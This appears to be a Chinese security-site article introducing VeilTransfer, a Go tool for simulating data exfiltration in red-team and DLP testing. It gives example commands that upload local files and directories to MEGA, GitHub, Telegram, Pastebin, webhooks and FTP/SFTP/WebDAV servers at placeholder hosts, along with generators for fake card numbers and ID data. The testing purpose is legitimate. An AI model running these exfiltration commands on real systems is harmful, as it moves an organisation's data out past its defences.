如何使用VeilTransfer评估和提升组织的数据安全态势
2024-9-6 13:10:45 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

关于VeilTransfer

VeilTransfer是一款功能强大的企业数据安全检测与增强工具,该工具基于Go语言开发,旨在帮助广大研究人员完成企业环境下的数据安全测试并增强检测能力。

此工具模拟了高级威胁行为者使用的真实数据泄露技术,使组织能够评估和改善其安全状况。通过利用多种泄露方法(例如 MEGA、Github、SFTP、WebDAV 等),VeilTransfer 可帮助识别防御漏洞并确保您的安全解决方案已准备好应对现代数据泄露。

功能介绍

当前版本的VeilTransfer支持下列数据提取方法与对象:

1、MEGA

2、Github

3、Telegram

4、Pastebin

5、WebDAV

6、Webhook

7、SFTP

8、FTP

工具场景

1、红队活动:在红队演习期间部署 VeilTransfer,以复杂而逼真的撤离场景挑战蓝队。

2、紫队活动:与您的防御团队合作,模拟并检测撤离企图,改进进攻和防御战术。

3、安全测试:使用 VeilTransfer 验证数据丢失防护 (DLP) 解决方案、防火墙和其他网络安全措施的有效性。

工具要求

Go语言运行环境

工具安装

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好最新版本的Go环境。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

https://github.com/infosecn1nja/VeilTransfer.git

工具使用

通过 SFTP 传输文件

此示例演示如何使用 SFTP 协议安全地将文件传输到远程服务器。该文件位于本地计算机上,并使用 SSH 身份验证将其传输到指定的远程目录。

VeilTransfer transfer -method sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

传输文件到 WebDAV 服务器

在此示例中,本地目录中的文件被上传到 WebDAV 服务器。服务器需要用户名和密码进行身份验证。服务器参数包括 URI 方案(https:// 或 http://)。

VeilTransfer transfer -method webdav -localPath /path/to/directory -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

将文件传输至 Mega Cloud

此示例显示如何将文件传输到 Mega Cloud 存储。文件从指定的本地目录上传,并使用用户的 Mega Cloud 凭据进行身份验证。

VeilTransfer transfer -method mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

通过 FTP 传输文件

在此示例中,将文件上传到 FTP 服务器。该文件被传输到远程服务器上的特定目录。服务器需要用户名和密码进行身份验证。

VeilTransfer transfer -method ftp -localPath (/path/to/file or /path/to/directory) -remoteDir remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

将文件上传到 Pastebin

此示例演示如何将文件内容上传到 Pastebin。使用用户提供的 API 密钥将内容发布到 Pastebin。

VeilTransfer transfer -method pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

发送文件到 Github 仓库

此示例显示如何将文件从本地计算机推送到特定的 GitHub 存储库。使用用户的 GitHub API 令牌进行身份验证将文件添加到存储库。

VeilTransfer transfer -method github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

发送文件到 Telegram 频道

此示例演示如何将文件发送到特定 Telegram 频道。使用 Telegram 机器人 API 令牌发送文件,并将消息传递到指定的频道 ID。

VeilTransfer transfer -method telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

将数据发送到 Webhook URL

在此示例中,文件的内容被发送到指定的 Webhook URL。

VeilTransfer transfer -method webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

创建一个简单的 Zip 文件

此示例显示如何从指定目录创建 zip 文件。输出是包含目录中所有文件的单个 zip 文件。

VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

创建拆分 Zip 文件

此示例演示如何创建拆分为多个部分的 zip 文件,每个部分的大小不超过指定的大小。这对于以较小的块传输大文件非常有用。

VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

生成 100 个虚假金融卡号

此示例显示如何生成 100 条虚假金融卡数据。生成的数据将包括金融卡号、有效期和相关详细信息。

VeilTransfer generate-fake -ccn -count 100

生成 50 个虚假的印尼 KTP 条目

此示例演示如何生成 50 条伪造的 KTP 数据(即印度尼西亚身份证)。数据包括姓名、地址和 KTP 号码等个人信息。

VeilTransfer generate-fake -ktp -count 50

生成 200 个虚假社会安全号码

此示例显示如何生成 200 条虚假 SSN 数据。这对于需要大量美国社会安全号码数据集的应用程序非常有用。

VeilTransfer generate-fake -ssn -count 200

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可协议。

项目地址

VeilTransfer:【GitHub传送门


文章来源: https://www.freebuf.com/sectool/410397.html
如有侵权请联系:admin#unsafe.sh